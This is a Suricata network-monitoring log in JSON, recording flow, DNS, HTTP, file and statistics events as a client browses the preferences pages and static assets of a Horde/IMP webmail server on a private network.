{"timestamp":"2020-02-29T00:20:10.000688+0000","flow_id":1067809082562313,"event_type":"flow","src_ip":"192.168.10.122","src_port":34810,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:09.186121+0000","end":"2020-02-29T00:15:09.294351+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.002024+0000","flow_id":376680125051247,"event_type":"flow","src_ip":"192.168.10.122","src_port":34528,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:08.930159+0000","end":"2020-02-29T00:15:09.038527+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:10.267171+0000","flow_id":2077710532005367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52922,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":1}} {"timestamp":"2020-02-29T00:20:11.000774+0000","flow_id":1222994856334552,"event_type":"flow","src_ip":"192.168.10.130","src_port":34880,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1167,"bytes_toclient":643,"start":"2020-02-29T00:19:05.218328+0000","end":"2020-02-29T00:19:10.359486+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:13.000141+0000","event_type":"stats","stats":{"uptime":14865,"capture":{"kernel_packets":137255,"kernel_drops":0},"decoder":{"pkts":137258,"bytes":94155456,"invalid":192,"ipv4":135715,"ipv6":10,"ethernet":137258,"raw":0,"null":0,"sll":0,"tcp":130230,"udp":5278,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2832,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2848,"synack":2839,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1869,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2416,"failed_udp":112},"tx":{"http":4789,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2498}},"flow_mgr":{"closed_pruned":2804,"new_pruned":17,"est_pruned":2469,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20504,"memcap_state":0,"memcap_global":0},"http":{"memuse":19654,"memcap":0}}} {"timestamp":"2020-02-29T00:20:13.001735+0000","flow_id":148136325567662,"event_type":"flow","src_ip":"192.168.10.122","src_port":45317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:12.611502+0000","end":"2020-02-29T00:15:12.719590+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:13.602993+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38148,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62318,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:13.714116+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38148,"proto":"UDP","dns":{"type":"answer","id":62318,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:13.714116+0000","flow_id":2114307948884849,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38148,"proto":"UDP","dns":{"type":"answer","id":62318,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:13.773965+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:20:14.000659+0000","flow_id":1624213506063863,"event_type":"flow","src_ip":"192.168.10.122","src_port":43745,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.425463+0000","end":"2020-02-29T00:15:13.533751+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:14.000956+0000","flow_id":104855940204179,"event_type":"flow","src_ip":"192.168.10.122","src_port":50670,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.624275+0000","end":"2020-02-29T00:15:13.729610+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:14.001088+0000","flow_id":978800180569870,"event_type":"flow","src_ip":"192.168.10.122","src_port":50520,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:13.763662+0000","end":"2020-02-29T00:15:13.872716+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:16.652632+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} {"timestamp":"2020-02-29T00:20:16.662657+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55639,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62642,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:16.774063+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55639,"proto":"UDP","dns":{"type":"answer","id":62642,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:16.774063+0000","flow_id":80645229386881,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55639,"proto":"UDP","dns":{"type":"answer","id":62642,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:16.879486+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799}} {"timestamp":"2020-02-29T00:20:16.925711+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:20:16.928813+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:20:16.930401+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:20:16.980134+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":0}} {"timestamp":"2020-02-29T00:20:16.980407+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:20:16.982215+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":1}} {"timestamp":"2020-02-29T00:20:16.983390+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:20:16.983592+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:20:17.025464+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:20:17.064556+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":3}} {"timestamp":"2020-02-29T00:20:17.064917+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:20:18.000801+0000","flow_id":1152402773196756,"event_type":"flow","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":34,"pkts_toclient":39,"bytes_toserver":4542,"bytes_toclient":40700,"start":"2020-02-29T00:18:55.933844+0000","end":"2020-02-29T00:19:17.296921+0000","age":22,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:18.001075+0000","flow_id":745974314004663,"event_type":"flow","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":10,"bytes_toserver":1862,"bytes_toclient":6621,"start":"2020-02-29T00:19:11.618679+0000","end":"2020-02-29T00:19:17.006675+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:20.000363+0000","event_type":"stats","stats":{"uptime":14872,"capture":{"kernel_packets":137308,"kernel_drops":0},"decoder":{"pkts":137317,"bytes":94179587,"invalid":192,"ipv4":135774,"ipv6":10,"ethernet":137317,"raw":0,"null":0,"sll":0,"tcp":130285,"udp":5282,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2835,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2851,"synack":2842,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1871,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2418,"failed_udp":112},"tx":{"http":4797,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2500}},"flow_mgr":{"closed_pruned":2804,"new_pruned":17,"est_pruned":2473,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19840,"memcap_state":0,"memcap_global":0},"http":{"memuse":88884,"memcap":0}}} {"timestamp":"2020-02-29T00:20:21.601070+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62216,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:21.634801+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:20:21.712317+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60597,"proto":"UDP","dns":{"type":"answer","id":62216,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:21.712317+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60597,"proto":"UDP","dns":{"type":"answer","id":62216,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:21.808452+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5314}} {"timestamp":"2020-02-29T00:20:21.899880+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5314},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":5}} {"timestamp":"2020-02-29T00:20:21.902229+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:20:21.987567+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":2}} {"timestamp":"2020-02-29T00:20:26.000487+0000","flow_id":500671536956992,"event_type":"flow","src_ip":"192.168.10.122","src_port":34200,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:15:24.919104+0000","end":"2020-02-29T00:15:25.027922+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:26.906231+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":6}} {"timestamp":"2020-02-29T00:20:27.000216+0000","event_type":"stats","stats":{"uptime":14879,"capture":{"kernel_packets":137323,"kernel_drops":0},"decoder":{"pkts":137344,"bytes":94189208,"invalid":192,"ipv4":135797,"ipv6":10,"ethernet":137344,"raw":0,"null":0,"sll":0,"tcp":130306,"udp":5284,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2835,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2851,"synack":2842,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1871,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2419,"failed_udp":112},"tx":{"http":4799,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2501}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2473,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19840,"memcap_state":0,"memcap_global":0},"http":{"memuse":19654,"memcap":0}}} {"timestamp":"2020-02-29T00:20:28.000592+0000","flow_id":816909979187263,"event_type":"flow","src_ip":"192.168.10.122","src_port":58159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:15:27.489535+0000","end":"2020-02-29T00:15:27.598059+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:31.635589+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23772,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:31.746740+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35430,"proto":"UDP","dns":{"type":"answer","id":23772,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:31.746740+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35430,"proto":"UDP","dns":{"type":"answer","id":23772,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 